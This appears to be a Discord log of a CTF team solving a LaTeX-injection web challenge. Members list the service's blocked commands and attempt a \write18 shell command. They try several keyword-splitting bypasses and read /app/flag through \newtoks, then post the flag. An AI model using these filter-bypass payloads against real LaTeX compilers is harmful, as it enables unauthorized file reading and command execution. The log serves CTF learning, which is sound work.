Project Sekai - ✅-web-homework-render

Homework Render - 500 points

Category: Web Description: Isn't writing math homework hard? We have created an easy-to-use homework submission portal that allows you to type up your homework. We don't think anyone can get into this server for free answers! Author: ap hw-render.chall.lol Files: No files. Tags: No tags.

Sutx pinned a message to this channel. 04/28/2023 3:00 PM

@Violin wants to collaborate

@jayden wants to collaborate

@Legoclones wants to collaborate

Looks like LaTeX injection

18:06

Flag is at /app/flag?

18:06

Blind LateX injection since it doesn't actually show up?

Unsafe latex tags used!

18:07

cant use \immediate\write18{}

18:08

18:08

prob use def to bypass

18:08

https://0day.work/hacking-with-latex/

Hacking with LaTeX

In this blogpost I want to outline basic attacks against web based LaTeX compilers. This inspired me to create the Web90 - TexMaker challenge. TexMaker was a simple website where one could enter LaTeX code and the server would create a PDF file using pdflatex. You'll find similar services on

Blocked:

\write18
\input
\include
\immediate
\url
\href
\newread
\newwrite
\file
\lstinputlisting{}
\usepackage{}
\verbatiminput{}

(edited)

18:14

Can't write to file, so doesn't look like the \def strat will work

18:20

trying different cases hasn't done anything yet

18:20

also can't write to other fds, not just 18

18:23

Interestingly, trying something like \immediate\write18{pwd | base64 > a} gives "Error in processing your request" instead of unsafe tags

ye

It looks like \def is also blocked

Legoclones

Interestingly, trying something like \immediate\write18{pwd | base64 > a} gives "Error in processing your request" instead of unsafe tags

file system is prob read only

yeah

@fleming wants to collaborate

@rubiya wants to collaborate

\documentclass{article}
\begin{document}
foo < bar > baz
\end{document}

returns foo ¡ bar ¿ baz

23:27

< -> ¡, > -> ¿

but why? is it intended behavior?

Not sure

probably expected, idk. but usually you use $$ around math eqn

23:42

then it will be normal

\providecommand{\x}{inpu}
\providecommand{\y}{\x t}

foo < bar > baz
\begin{document}
\end{document}

doesnt seem to work

23:58

normal render can give this

23:58

but in theirs

\providecommand{\x}{\inpu}
\providecommand{\y}{\xt}

\begin{document}
\y{flag.txt}
\end{document}

will give

@irogir wants to collaborate

guessy challenges

so many blacklist

its ok strellic will solve

lmao

is this RCE btw?

lfi i think

11:30

/app/flag

oh

11:31

how do you know /app/flag

11:31

and the blocklist

robots.txt

blocklist is guess lmao

Legoclones

Blocked:

\write18
\input
\include
\immediate
\url
\href
\newread
\newwrite
\file
\lstinputlisting{}
\usepackage{}
\verbatiminput{}

(edited)

this

11:31

guessed?

yeah

if cant render, blocklist :))

ah ok

so we still need \input{/app/flag} i think?

12:03

if nothing is banned

yeah

from what strellic guessed some random tag isnt black listed so we may need to try figure it out idk though

@chenx3n wants to collaborate

\documentclass{article}
\RequirePackage{verbatim}
\begin{document}
\in={in}
\put={put}

\begin{verbatim\in\put}{/app/flag}\end{verbatim}
\end{document}

14:23

the output

14:23

14:24

\documentclass{article}

\newtoks \test

\begin{document}

    \test={123}
    \test=\test{666}
    \test=\test{hhh}
    \the\test

\end{document}

got a weird result when sending this: \inclu\de{/app/flag}

14:27

wtf

fk got it

its not working now xD

UMDCTF{M4th_iS_H4rd_bUt_LaT3X_1s_H4rd3r}

2

gg

14:27

how?

1

use \newtoks

2

14:28

can someone submit it?

14:28

or use the bot?

14:28

@sahuang

Legoclones

used /ctf submit

❌ Incorrect flag.

14:28

✅ Challenge solved.

Okay I submitted it for you

okay nice thanks

Yup, gg!

very work https://tex.stackexchange.com/questions/594350/the-puzzling-thing-about-newtoks-and-the-token-list